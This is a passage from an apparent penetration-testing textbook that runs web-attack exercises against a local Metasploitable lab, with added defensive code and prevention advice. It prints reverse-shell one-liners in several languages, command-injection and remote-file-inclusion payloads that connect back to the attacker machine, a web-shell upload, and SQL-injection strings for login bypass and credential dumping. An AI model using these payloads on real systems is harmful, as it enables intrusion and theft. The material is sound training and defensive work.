- DNS records
- Unlisted files, subdomains, directories
Exercise 45: Web Site Information gathering
Netcraft site report (https://toolbar.netcraft.com/site_report)
The Netcraft site report is a very useful service that produces a detailed
report about any website and gives you all the information in one place,
including the technologies used by the website and any trackers it loads. You
can cross-reference the technologies and versions gathered this way with the
Exploit Database (https://www.exploit-db.com/) to see whether there are public
exploits that could be used against the website.
DNS information:
We can get comprehensive DNS information using the Robtex DNS lookup. Robtex
is a website where you enter the name of the site and get back detailed
information about it. The link to Robtex is: https://www.robtex.com
12.3. Discovering websites on the same Server
One server can host many websites, and gaining access to one website may help
in gaining access to the others on the same server. So if you cannot find any
vulnerability in the target website but there are other websites on the same
server, gaining access to one of those that is vulnerable can lead to access
to the server itself and then to the target website.
You can use the Robtex report to see other websites that share the same IP
address.
12.4. Subdomains
Subdomains are sites that use the same domain name but differ in the leftmost
label; for example google.com has the subdomain mail.google.com that takes
you directly to the Google mail page. Discovering subdomains is important
because some companies have subdomains that are not advertised and are used
either internally by employees or by special customers to give them access to
special services. These subdomains are not seen in search engines because no
links lead to them. Because of their hidden nature such subdomains may not be
secured as well as the public website and may contain vulnerabilities. Many
websites also have a staging subdomain: when a new update or a big change is
made, it is installed on the staging subdomain for testing before being
installed on the main website.
Exercise 46: Discovering Subdomains with Knock Tool
Knock is a tool that takes a domain name and finds its subdomains by trying a
wordlist of candidate names. First download the tool, then run it in Kali as
in the following procedure:
1. Log in to Kali and open a terminal window:
#git clone https://github.com/guelfoweb/knock.git
2. Change into the downloaded folder, locate knockpy.py, and run the Python
script:
#python knockpy.py <website>
3. The tool takes some time to run, as it tries every candidate subdomain in
its wordlist, then shows the results.
12.5. Finding Files and Directories
Websites consist of directories and files. When you access any page on a
website you are accessing a file inside a directory; for example, when you
open http://10.0.2.5/mutillidae/ you are accessing a folder called mutillidae
on the website at 10.0.2.5, and then a file inside that folder produces the
page you are browsing.
Exercise 47: Finding Files and Directories
1. Open the Metasploitable VM from VirtualBox.
2. Log in as msfadmin/msfadmin.
3. Make sure the folder mutillidae exists.
4. Check the IP address of the Metasploitable machine.
5. From Kali open the mutillidae web page.
6. Use the dirb tool to find files and folders.
dirb is a tool that comes by default as part of Kali and can search any
website for directories and files using a wordlist attack. To see how dirb is
used, open a terminal in Kali and type:
#man dirb
Since dirb uses brute force, it needs a wordlist to drive the attack. There
are default wordlists under /usr/share/dirb/wordlists, or you can create your
own wordlist with the crunch tool.
7. Use dirb to discover files and folders on the mutillidae website:
# dirb http://10.0.2.5/mutillidae -o output.txt
Analyzing the files discovered:
The files discovered are pages we can access through the web browser, because
they are under the web root, and they may provide valuable information.
Follow the link to each one as shown in the screenshot below.
- For example we can access the phpinfo page,
http://10.0.2.5/mutillidae/phpinfo.php, which shows the PHP configuration.
- Another example is the robots.txt file: it tells Google and other search
engines not to index the files listed in it, which also makes it a ready-made
list of paths the site owner would rather nobody looked at.
- If we open the passwords folder in the web browser and then click the
accounts.txt file, we get the contents shown below.
12.6. File uploads, code execution and file inclusion
Some websites allow users to upload files, for example classified
advertisement sites that let users upload images. If the website is not
secured, this may allow users to upload other types of files that compromise
the website and let adversaries take control of it. In the following exercise
we take control of a vulnerable website by uploading a PHP file that gives us
a PHP shell.
Exercise 48: File Upload
In this exercise we use the website on the Metasploitable virtual machine to
see how a file upload vulnerability can be used to upload PHP code that gives
us full control of the web server.
1. From Kali open a web browser, enter the Metasploitable IP address, then
click DVWA and log in.
2. Login used: admin / password
3. Set DVWA security to low.
4. Click Upload.
5. The website lets us upload files using the Upload button (in real life,
classified websites allow you to upload images and other files).
6. The website expects an image. First we upload an image as expected, then
we upload a PHP file.
7. Uploading an image file: browse to the image, select it, then click Upload.
8. As you can see, the picture was uploaded to the path shown:
../../hackable/uploads/index.jpg
9. To see the uploaded picture, enter its link in the Kali browser as shown
in the screenshot below.
Uploading a PHP file:
Weevely: Weevely is a stealthy PHP web shell that simulates a telnet-like
connection. It is an essential tool for web application post-exploitation and
can be used as a stealthy backdoor or as a web shell to manage legitimate web
accounts, even free hosted ones.
10. We use the Weevely tool to create a payload in a PHP file and upload it
to the website.
11. To create the PHP shell file, go to the Kali terminal and type:
#weevely generate 12345 /root/shell.php
(12345 is the password that protects our file, so that once it is uploaded to
the website only we can use it.)
12. The file is generated and stored in Kali under /root.
13. Make sure DVWA security is set to low.
14. Go to the website and upload the shell.php file.
15. Use Kali to connect to the shell.php file we uploaded to the site:
#weevely <web link to the file> 12345
For example, with Metasploitable at 10.0.2.5:
#weevely http://10.0.2.5/dvwa/hackable/uploads/shell.php 12345
16. From the weevely> prompt we can run any Linux command on the target
machine.
17. To see what else Weevely can do, just type help.

Remote Code Execution:


Remote code execution is the ability to execute a code inside the website and
run OS commands and interacting with the website host operating system.
For example, if the website offers a service that allow the user to verify
connectivity using ping command, that is mean the website allow end users to
interact with the Website operating system. If the website does not sanitize
the input and only pass “ping command” there is a high possibility the user
can pass other commands to the OS that might lead to pulling sensitive
information from the system.
Remote Code Evaluation which is a vulnerability can be exploited if a user
S_E_Oblako

input is injected into a File or a String and executed (evaluated) by the


programming language's parser. Usually this behavior is not intended by the
developer of the web application. A Remote Code Evaluation can lead to a
full compromise of the vulnerable web application and web server. It is
important to note that almost every programming language has code
evaluation functions.
Exercise 49: Remote Code Execution
In the following example we use the Metasploitable virtual machine website to
exercise remote code execution.
1. From Kali open the Metasploitable DVWA web page and click Command
Execution.
2. Enter the Kali IP address and click ping.
3. In Linux we can combine several commands on one line using the semicolon
(;), so we can send the ping target followed by ; and then any command we
choose. For example, send the Kali IP address followed by the command pwd:
10.0.2.15; pwd
4. We can use this vulnerability to create a reverse connection that gives us
access to the website OS, the same way as shell.php did.
5. Make Kali listen for the incoming connection:
#nc -vv -l -p 8080
6. Open the Command Execution web page and enter the following in the ping
field:
10.0.2.15; nc -e /bin/sh 10.0.2.15 8080
7. Go back to the Kali terminal and see the connection established.
8. Now you can run Linux commands inside the Metasploitable machine.
Notes
A user who reaches the vulnerable machine through command execution does not
have root permission: the commands run as the web server user and are
limited to what that user is allowed to do.
Depending on the website technology you may need to change the reverse
connection instruction. Below are reverse connection one-liners in different
programming languages. Choose the one whose interpreter exists on the web
server; for example, if the website runs PHP, the PHP one-liner below will
work. The -e option used with netcat exists in the traditional netcat shipped
on Metasploitable; many newer netcat builds remove it, in which case use one
of the other one-liners.
The IP address of the attack machine and the port must be included in the
instruction, and the Kali listener should be set up with:
#nc -vv -l -p <port number>
Reverse connection code in different languages
BASH
bash -i >& /dev/tcp/10.0.2.15/8080 0>&1
PERL
perl -e 'use Socket;$i="10.0.2.15";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.2.15",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.2.15",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.2.15 8080
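The ping page in Exercise 49 is vulnerable for one reason: the user's text is glued into a command string that a shell then parses, so the shell's own separators (`;`, `&&`, `|`, backticks) become part of the attacker's input. The following Python pair is an added example, not code from the book or from DVWA, showing that pattern beside the fix that section 12.7 recommends (allowlist the input, never go through a shell). `ping` is replaced by `echo` so the example runs offline without ICMP privileges; the injection behaves exactly the same with the real command. It assumes a POSIX `sh` is available.

```python
import ipaddress
import shlex
import subprocess

# ping is stood in for by echo so the example runs offline; the injection
# works identically against "ping -c 1".
PING_COMMAND = "echo PING"


def ping_vulnerable(target):
    """The DVWA pattern: user input pasted into a shell command string.
    Everything after a ';' (or '&&', '||', '|', '`...`', '$(...)') is run
    by the shell as a second command."""
    cmd = PING_COMMAND + " " + target                      # no validation
    done = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    return done.stdout


def is_safe_target(target):
    """Allowlist: the input must parse as an IPv4 or IPv6 address. A hostname
    would need an equally strict rule (letters, digits, dots, hyphens only)."""
    try:
        ipaddress.ip_address(target.strip())
        return True
    except ValueError:
        return False


def ping_hardened(target):
    """Validate first, then run the command as an argv list and never through
    a shell, so metacharacters in the input carry no meaning."""
    if not is_safe_target(target):
        raise ValueError("rejected target: %r" % target)
    argv = shlex.split(PING_COMMAND) + [target.strip()]
    done = subprocess.run(argv, capture_output=True, text=True)
    return done.stdout


if __name__ == "__main__":
    payload = "10.0.2.15; id"
    print(ping_vulnerable(payload))          # second line: output of id
    print(ping_hardened("10.0.2.15"))
    try:
        ping_hardened(payload)
    except ValueError as err:
        print(err)
```

Note that even the hardened version still lets a user make the server send packets to an address of their choosing (an internal scanner in disguise), so a real application should also restrict which networks may be pinged.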
Local file inclusion vulnerabilities (LFI)
File inclusion is part of every advanced server-side scripting language on
the web. It is needed to keep web application code tidy and maintainable, and
it also lets web applications read files from the file system, provide
download functionality, parse configuration files, and do similar tasks. If
it is not implemented properly, attackers can exploit it and craft an LFI
attack, which may lead to information disclosure, cross-site scripting (XSS)
and, through remote file inclusion (RFI), remote code execution.
How to test
Since LFI occurs when paths passed to "include" statements are not properly
sanitized, in a black-box testing approach we look for scripts that take
filenames as parameters. Consider the following example:
http://vulnerable_host/preview.php?file=example.html
This looks like a perfect place to try for LFI. If the script directly
includes the input parameter instead of selecting the appropriate page from a
fixed array by name, it is possible to include arbitrary files on the server.
A typical proof of concept is to load the passwd file:
http://vulnerable_host/preview.php?file=../../../../etc/passwd
Exercise 50: File Inclusion
1. In Kali open the Metasploitable DVWA web page.
2. Click File Inclusion.
In the web page address bar, after page=, enter any name that does not exist
to reveal the path.
3. This gives an error as shown above; from the error we can see the location
of the including script, which is
/var/www/dvwa/vulnerabilities/fi/include.php
4. The current working directory on the operating system is therefore
/var/www/dvwa/vulnerabilities/fi/
5. To read a file in another directory, for example /etc/passwd, which lists
all users of the machine, we have to go up five directory levels (fi,
vulnerabilities, dvwa, www, var) to reach the root of the file system.
6. So to see /etc/passwd we write in the URL:
?page=../../../../../etc/passwd
7. Each ../ moves one directory up, like typing cd .. five times. Extra ../
beyond the root are harmless, because the parent of the root is the root
itself, so when the depth is unknown it is common to simply use more of them.
8. Through this vulnerability we were able to list all users of the machine
from /etc/passwd, and in the same way we can read any other file the web
server user is allowed to read.
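The counting in steps 5 to 7, and the static-inclusion fix recommended in 12.7, can both be shown with a few lines of path arithmetic. The following Python block is an added example, not code from the book or from DVWA: it builds the traversal payload for a given include directory, resolves it the way an unchecked include() does, and beside that implements an allowlisted include that rejects anything not on the list or outside its directory. The include directory is the one the DVWA error message revealed; the list of legitimate page names is an assumption for the example.

```python
import posixpath

# Layout taken from the DVWA error message in Exercise 50; ALLOWED_PAGES is
# an assumed list of the pages the application legitimately serves.
INCLUDE_DIR = "/var/www/dvwa/vulnerabilities/fi"
ALLOWED_PAGES = ("include.php", "file1.php", "file2.php", "file3.php")


def traversal_depth(include_dir):
    """How many ../ are needed to climb from include_dir to the file system root."""
    return len([part for part in include_dir.split("/") if part])


def build_payload(depth, target):
    """Build the page= value that reaches an absolute path from include_dir."""
    return "../" * depth + target.lstrip("/")


def resolve_vulnerable(page):
    """What include($_GET['page']) does: resolve the name relative to the
    script's directory and open whatever that turns out to be."""
    return posixpath.normpath(posixpath.join(INCLUDE_DIR, page))


def resolve_hardened(page):
    """Static inclusion as recommended in 12.7: only names on the allowlist
    are accepted, and the resolved path must still lie inside INCLUDE_DIR.
    Returns None when the request is rejected."""
    if page not in ALLOWED_PAGES:
        return None
    full = posixpath.normpath(posixpath.join(INCLUDE_DIR, page))
    if not full.startswith(INCLUDE_DIR + "/"):
        return None
    return full


if __name__ == "__main__":
    depth = traversal_depth(INCLUDE_DIR)                    # 5
    payload = build_payload(depth, "/etc/passwd")
    print(payload, "->", resolve_vulnerable(payload))       # /etc/passwd
    longer = build_payload(depth + 3, "/etc/passwd")        # too many ../ still works
    print(longer, "->", resolve_vulnerable(longer))
    print(resolve_hardened(payload))                        # None: rejected
    print(resolve_hardened("file1.php"))
```

The containment check in resolve_hardened is deliberately kept even though the allowlist already makes it redundant: if someone later relaxes the allowlist to a pattern, the second check is what keeps ../ out.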

Remote file inclusion vulnerability
Remote file inclusion is the same as local file inclusion, except that in the
address bar we put the URL of another server and the path to a file there,
which the website then fetches and executes; this lets us open a backdoor in
the website itself. For this to work, two settings in the PHP configuration
file must be On: allow_url_fopen (lets PHP open URLs at all, On by default)
and allow_url_include (lets include/require load a URL, Off by default and
switched On in the exercise below).
Exercise 51: Remote File inclusion
1. To check the PHP setting, go to the Metasploitable machine and type:
#sudo nano /etc/php5/cgi/php.ini
2. Enter the msfadmin password (msfadmin) when sudo asks for it.
3. Press Ctrl+W to search inside nano for allow_url
4. Change the second parameter, allow_url_include = Off, to On.
5. Press Ctrl+X, then save and exit. If the change does not take effect,
restart Apache: #sudo /etc/init.d/apache2 restart
6. On the Kali machine create the remote file that starts the reverse
connection back to Kali: open leafpad and enter the following PHP code
(replace the IP address and port with Kali's):
<?php
passthru("nc -e /bin/sh kali_ip_address port");
?>
- passthru("...") executes whatever command is between the parentheses.
- Save the file in Kali under /var/www/html with a .txt extension (for
example remotefile.txt). The extension matters: saved as .php, Kali's own
Apache would execute the script instead of serving its source, and the
target would have nothing to include.
- On the Kali machine listen for the external connection with:
#nc -vv -l -p 8080
- Make sure the apache2 service is running on Kali and that you can fetch
the file through a browser inside Kali.
7. The file we created on the Kali web server, remotefile.txt, contains the
PHP script.
8. When the target includes it, the script starts a reverse connection back
to the Kali machine.
9. From the Kali web browser go to the Metasploitable DVWA page, click File
Inclusion, and put the link to the file in the page parameter as in the
screenshot below:
?page=http://kali_ip_address/remotefile.txt
10. Check the Kali terminal to make sure the connection is established.
11. Enter commands:
uname -a
pwd
ls
12.7. Preventing above vulnerabilities
Uploading files:
If the website functionality requires users to upload files, the website code
must check the file type and allow only the expected type. For example, if
the website expects users to upload JPG pictures, it should accept only JPG
files and reject every other type. Check the content (the file signature),
not just the extension or the client-supplied Content-Type, and store the
file under a name chosen by the server.
Code Execution:
Code execution should be prevented, and the page should not accept any kind
of code. If the page must have such a function, make sure that you:
- Sanitize user input. This is not easy, because of the large number of
possible bypasses of restrictions; prefer a strict allowlist of what the
input may look like (for example, only a valid IP address).
- Do not let users decide the extension or content of files on the web
server, and use safe practices for secure file uploads.
- Never pass user-controlled input into evaluation functions or callbacks.
- Blacklisting special characters or function names is, like sanitizing,
almost impossible to implement safely; treat it as a last resort, not a
defense.
File Inclusion:
Remote file inclusion should be disabled in php.ini for both settings:
allow_url_fopen = Off
allow_url_include = Off
The other way to prevent file inclusion is to use static page inclusion in
the PHP code (a fixed list of pages selected by name) rather than dynamic
inclusion of user-supplied paths.
Web Application Firewall (WAF)
A WAF, or Web Application Firewall, helps protect web applications by
filtering and monitoring HTTP traffic between a web application and the
Internet. It typically protects web applications from attacks such as
cross-site request forgery, cross-site scripting (XSS), file inclusion, and
SQL injection, among others. A WAF is a layer 7 (OSI model) defense and is
not designed to defend against all types of attacks; it is usually part of a
suite of tools that together create a holistic defense against a range of
attack vectors.

13
SQL Injection

SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements via web page input. If the website has a database and expects users to log in, for example with fields for username and password, attackers may use these fields to enter SQL statements that can bypass the authentication and give direct access to the database.
In this section we are going to do manual and automated SQL injections, and list the recommendations to protect websites against SQL injection.

13. SQL injection

Most websites use a database to store data such as files, pictures, audio, video and more. The web application uses the database to store and retrieve web contents, and it uses the SQL language to interact with the database.
An SQL injection vulnerability gives the attacker access to the database, where he can read all database contents, including accounts and passwords. With those credentials he can access the systems using a legitimate account, which is extremely hard to discover. SQL injection is more powerful than the PHP script and file inclusion techniques because it gives direct access to the database without needing access to the operating system.
Exercise 52: Logging in to the Database
This exercise introduces databases and some SQL commands to those who are not familiar with databases. We are going to access the database that is used by the web application and show some database tables and their contents.
1. Start the Metasploitable machine.
2. Open a Kali machine terminal window.
3. To access the database you need the database user; in this exercise the database user is root:
#mysql -u root -h 10.0.2.5
(10.0.2.5 is the IP address of the Metasploitable machine.)
4. When you get the MySQL> prompt, that means you are now inside the database and you can run SQL commands to show database tables and do database queries:
MySQL> show databases;
(Do not forget the ";" at the end of the SQL command.)

5. Exploring databases:
MySQL> use owasp10;
MySQL [owasp10]> show tables;
6. Looking inside the tables:
MySQL [owasp10]> select * from accounts;
7. The DBA designs the databases and creates the tables. The web application inserts the data into the tables based on end user interaction.

13.1. Discovering SQL injection

Every web application that accepts input from users uses a database to store and retrieve the users' data; website information gathering tools will also show whether the website uses a database, and show the database type and version. There are many tools that can find SQL injection vulnerabilities in a website, and we are going to use some of them in this section. For manual SQL injection discovery, penetration testers usually enumerate the set of parameters that each page takes and try putting special characters like quotes into them. If entering O'Reilly in a form input causes an exception, then there is a good chance ' OR '' == ' will cause a whole bunch more results to come out than the programmer intended.

Configuring the Metasploitable website:

Fixing the lab issue
In older versions of the Metasploitable machine there is a configuration error in the database settings; the following procedure is just to make sure the database that we are going to use for testing is configured correctly.
1. Open a shell in the Metasploitable machine.
2. Log in using msfadmin/msfadmin.
3. #sudo mysql
4. mysql> show databases;
5. Type Control + C.
6. Type:
#sudo nano /var/www/mutillidae/config.inc
7. Check line 4, $dbname = 'owasp10'; if it is metasploit then change it to owasp10.
8. Hit Control + X, then Y to save, and Enter.

Exercise 53: Breaking a webpage

1. From the Kali machine, open the webpage at the Metasploitable virtual machine.
2. Click on Mutillidae.
3. Click on Login/Register and register a new user.
4. Create an account with username user and password password.
5. Log in with the user just created.
6. Log out.
7. Log in again as follows:
Username = test <or the user you created>
Password = just the single quote character '
8. The login will fail but the system will throw an SQL error.
Error Analysis
9. It is a database error that contains the location of the file and the database statement that failed: SELECT * FROM accounts WHERE username='test' AND password='''
10. This means the database is vulnerable to SQL injection.

13.2. Injecting code in a webpage

Exercise 54: Injecting Code into a Webpage
1. Go back to the login page and enter the username (user).
2. Enter the user's password followed by the statement ' AND 1=1# (password' AND 1=1#) and hit Enter.
3. If the page logs you in without an error, that means the page accepted the injected code 1=1.
4. The login is successful because we provided the password and a true SQL statement, AND 1=1#; this means the field accepts any SQL statement.
5. To prove it, log out and log back in again but replace 1=1 with 1=2; the page should give an error and the login will fail because the AND statement is not true.
6. Even though we gave the right username and password, the page gave us an error because the added SQL statement AND is followed by 1=2, which is not true.
7. This confirms that the website actually injects anything typed in the password field into the query, which means that we can use the password field to inject a complete SQL statement and the website will execute it, if it is in the right SQL format.

Exercise 55: Login as Admin without a password

In this exercise we are going to use SQL injection to log in to the webpage as admin without knowing the admin password; instead we are going to use an OR statement in the password field.
1. Open the Mutillidae page.
2. Click on Login/Register.
3. In the username field enter admin.
4. In the password field enter aaa' OR 1=1# and hit Enter.
5. The system here tries to run the following SQL statement:
6. The first part is not true because the admin password we entered is not right; because we used an OR statement and the second part (1=1) is true, the system allows us to continue to the admin page.

Injecting using the Username Field:

7. The statement that the webpage tries to run for username and password is as follows:
8. So far we were injecting using the password field; in this exercise we will try to use the username field to inject SQL code.
9. Here we enter admin followed by a single quote and the # sign. The # sign tells the database to ignore everything after it, including the password check. The system will allow us to log in even though no password was entered.

13.3. Discovering SQL injection in GET


What is the difference between HTTP GET and HTTP POST?
HTTP POST requests supply additional data from the client (browser) to the
server in the message body. In contrast, GET requests include all required
data in the URL. Forms in HTML can use either method by specifying
method="POST" or method="GET" (default) in the <form> element. The
method specified determines how form data is submitted to the server. When
the method is GET, all form data is encoded into the URL, appended to the
action URL as query string parameters. With POST, form data appears within
the message body of the HTTP request.
In the previous exercises we were using the POST method to do SQL injections, using the username and password fields to POST the injection; in this exercise we are going to use the GET method, which uses the URL bar to do the injection.
Exercise 56: Discovering SQL injection vulnerability with GET
1. From Kali Linux open the web browser, enter the IP address of the Metasploitable virtual machine and go to the Mutillidae page.
2. Log in as user and go to the page:
3. OWASP Top 10
4. A1 Injection
5. SQLi - Extract Data
6. User Info
7. Copy the URL link.
8. Open the leafpad text editor and paste the URL as shown above.
9. Insert the statement order by 1 to tell the database to order the results by column 1, to prove that we can inject in the URL.
10. The order by statement is inserted after the username: ' order by 1 %23
11. %23 is the URL-encoded form of the # character.
12. Note that when we insert the line in the URL we have to change spaces and signs to their URL-encoded form. Below is a table for character conversion from sign to URL code, where space = %20.
13. Copy the modified URL to the URL field and hit Enter.
14. You will be logged in to the page normally and have the results as expected.
15. If you replace order by 1 with order by 10 you are going to see an error from the database because there is no column number 10.
16. That proves the page is vulnerable to SQL injection, as it interacts with the commands we enter in the URL.
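Injection through GET parameters has one property a defender can use: the probe ends up, percent-encoded, in the web server's access log. The following is an added example (not from the book, and not part of Mutillidae or Kali) of a small log check that percent-decodes each query parameter of an Apache-style access log line and reports the indicators used in Exercise 56 (order by probes, union select, quote plus tautology, quote plus comment, or a bare quote). The log lines, the page parameter value user-info.php and the pattern names are constructed for the demo.

```python
"""Added example (not from the book): flag SQL-injection probes in GET
query strings taken from access log lines. SAMPLE_LOG is constructed."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (Apache combined format), not real traffic
SAMPLE_LOG = """\
10.0.2.15 - - [12/Mar/2021:10:01:02 +0000] "GET /mutillidae/index.php?page=user-info.php&username=bob&password=x HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.2.15 - - [12/Mar/2021:10:01:09 +0000] "GET /mutillidae/index.php?page=user-info.php&username=bob%27%20order%20by%2010%23&password=x HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
10.0.2.15 - - [12/Mar/2021:10:01:15 +0000] "GET /mutillidae/index.php?page=user-info.php&username=bob%27%20union%20select%201,2,3,4,5%23&password=x HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
10.0.2.15 - - [12/Mar/2021:10:01:20 +0000] "GET /mutillidae/index.php?page=user-info.php&username=O%27Reilly&password=x HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# The request part of a combined-format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators, strongest first; each value reports only the first match
INDICATORS = [
    (re.compile(r"\border\s+by\s+\d+", re.I), "ORDER BY column probe"),
    (re.compile(r"\bunion\s+(all\s+)?select\b", re.I), "UNION SELECT"),
    (re.compile(r"'\s*(or|and)\s+\S+\s*=\s*\S+", re.I), "quote followed by OR/AND tautology"),
    (re.compile(r"'.*(#|--)", re.S), "quote plus SQL comment terminator"),
    (re.compile(r"'"), "unbalanced single quote"),  # weakest signal, last
]

def scan_line(line: str):
    """Return a list of (parameter, decoded_value, reason) for one log line.
    parse_qsl percent-decodes the values, so %27 and %23 become ' and #."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        for pattern, reason in INDICATORS:
            if pattern.search(value):
                hits.append((name, value, reason))
                break
    return hits

def scan_log(text: str):
    """Scan every line; return {line_number: hits} for lines with findings."""
    findings = {}
    for n, line in enumerate(text.splitlines(), start=1):
        hits = scan_line(line)
        if hits:
            findings[n] = hits
    return findings

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        for name, value, reason in hits:
            print(f"line {n}: {reason} in parameter {name!r}: {value!r}")
```

The fourth sample line shows why the bare quote is listed last: O'Reilly is legitimate input that trips the same check the book uses to discover the flaw, so in a real deployment that rule is noise unless it is combined with the stronger indicators or with the database error the application returned.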

13.4. Reading Database Information:

To read database information we need to guess how many columns the query returns. In the previous example order by 10 gave us an error; we are going to try the order by statement with smaller numbers until it stops giving the error.
Exercise 57: Reading and Extracting Data from the Website
Continue from Exercise 56 step 16.
17. order by 6 still gives an error, which means the number of columns is below 6.
18. Keep trying until the error goes away.
19. Now we know the number of columns is 5, so we are going to insert new SQL code to list all the columns.
20. Insert ' union select 1,2,3,4,5 (union select is an SQL command that allows us to have more than one select in the same command). The command will show us which columns are displayed on the page: column 2 is the username, column 3 is the password and column 4 is the signature.
21. The result is shown in the screenshot.
22. We can replace it with union select 1, database(), user(), version(), 5# to list the database name, the database user and the version.
23. The database name is owasp10 and the database user is root, which means that the web application is connected to the database as root and therefore we can pass any SQL command as root. In fact, the main objective of this exercise is to prove that we can get results from the database by injecting SQL commands in the URL.
24. To read more data from the database we are going to read the tables in the database from information_schema in the MySQL database.
25. By executing these commands we got all the tables in all databases.
26. If we want to look at the tables of a specific database such as owasp10:
27. Insert the following statement:

Extracting sensitive data:

28. If we need to read data from a table, we must know the column names first.
29. The following injection will show the column names:
30. To read the usernames and passwords from the accounts table:
31. We got all usernames and passwords in the accounts table.

13.5. Read/write files using the SQL vulnerability

In this exercise we are going to use SQL injection to read any file on the web server, even files outside the www folder, because the SQL database user is root; we are also going to write files to the website.
Exercise 58: Reading and writing files using the SQL vulnerability
1. To read a file inside the web server, I am going to insert the following statement in the URL:
union select, load_file('/etc/passwd'),null,null,null%23
2. As you can see from the above screenshot, I got the output of the file /etc/passwd.
3. To write to the website, insert the following code in the URL:
union select null, 'example example',null,null,null into outfile '/var/www/mutillidae/example.txt'
4. This will attempt to write a text file to /var/www/mutillidae.
5. That did not work because we do not have permission to write to the folder /var/www/mutillidae.
6. Replace that with the folder /temp and test.
7. And insert it again.
8. Because there is no SQL error, the file has been written. To check, we go to the Metasploitable machine and look at the file.

13.6. Using the Sqlmap tool

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches, from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
In all the previous examples we were using manual methods to discover and inject SQL; in the following example we will use the sqlmap tool, which automates the discovery and exploitation of SQL injection.
Sqlmap comes as part of Kali Linux and is designed to exploit SQL injections; the tool works with many database types such as MySQL, MSSQL, etc.
Exercise 59: Using the Sqlmap tool
1. Open the Kali browser and go to the Metasploitable virtual machine web page http://10.0.2.5/Mutillidae
2. Go to the login page and copy the URL.
3. Open a terminal window and type:
#sqlmap --level 3 -u <the link from the URL>
#sqlmap --level 3 -u http://10.0.2.6/mutillidae/index.php?page=user.info

4. The tool found the database type (MySQL), the PHP version and the Apache2 version.
5. Sqlmap figured out that the system is Linux Ubuntu 8.4 and the database is MySQL 5.0.12, and it stored the information it found in a text file.
6. Type:
#sqlmap --help
to learn more about the tool.

7. To see the databases, type the same command followed by --dbs:
#sqlmap --level 3 -u http://10.0.2.6/mutillidae/index.php?page=user.info --dbs
8. Answer No when asked whether to use your own cookies.

9. Check the current database.
10. See all the tables inside the owasp10 database.

Note
sqlmap is slow when retrieving information from the database; depending on the size of the database it may take more than 15 minutes to finish.

11. To get a dump of all data from the table accounts in the owasp10 database:
#sqlmap -u http://10.0.2.6/mutillidae/index.php -T accounts -D owasp10 --dump
12. This command makes a complete dump of a table inside the targeted database and stores the dump at
/root/.sqlmap/output/10.0.2.6/dump/
13. To see the stored dump file:
# cd /home/kali
#ls -al

13.7. Protection from SQL injection

Filters
In some situations, an application that is vulnerable to SQL injection (SQLi) may implement various input filters that prevent exploiting the flaw without restrictions. For example, the application may remove or sanitize certain characters, or may block common SQL keywords. There are numerous tricks that can bypass filters of this kind, so filters alone do not fix the underlying flaw.

Blacklist of some commands
Some programmers block some SQL commands like union and others to stop SQL injection, but again this method is not secure and can be bypassed.

Using Prepared Statements: Separate Data from SQL Code
The use of prepared statements with variable binding (aka parameterized queries) is how all developers should first be taught to write database queries. They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.
Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.
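The following is an added example, not code from the book or from Mutillidae, that builds the login query from Exercise 53 in both styles against an in-memory SQLite database so it runs stand-alone. login_dynamic() concatenates user input into the SQL string, as the vulnerable page does; login_parameterized() binds the same input as data. The accounts table and its credentials are constructed for the demo. The # comment form used in the exercises is MySQL-specific, so the example uses the tom' or '1'='1 form quoted in the text, which works against any SQL database.

```python
"""Added example (not from the book): dynamic query vs. prepared statement.
The accounts rows are constructed sample data, not the Metasploitable data."""
import sqlite3
from typing import Optional

def make_db() -> sqlite3.Connection:
    """Constructed sample accounts table with one admin and one normal user."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (username TEXT, password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("admin", "s3cret-admin-pw", 1), ("test", "password", 0)],
    )
    return conn

def login_dynamic(conn, username: str, password: str) -> Optional[str]:
    """Vulnerable: SQL code and user data are mixed in one string, so a quote
    in the input changes the meaning of the statement. Returns the matched
    username, or None when no row matches."""
    sql = ("SELECT username FROM accounts WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username: str, password: str) -> Optional[str]:
    """Safe: the statement text is fixed and the driver sends the values
    separately, so tom' or '1'='1 is compared literally with the password
    column and never becomes part of the query."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username=? AND password=?",
        (username, password),
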